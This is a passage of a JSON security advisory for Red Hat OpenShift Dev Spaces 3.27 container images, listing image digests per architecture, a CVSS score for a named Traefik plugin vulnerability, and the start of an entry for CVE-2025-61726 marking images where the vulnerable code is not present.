"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "traefik: Traefik\u0027s Client Plugin is Vulnerable to Path Traversal, Arbitrary File Overwrites and Remote Code Execution"
},
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
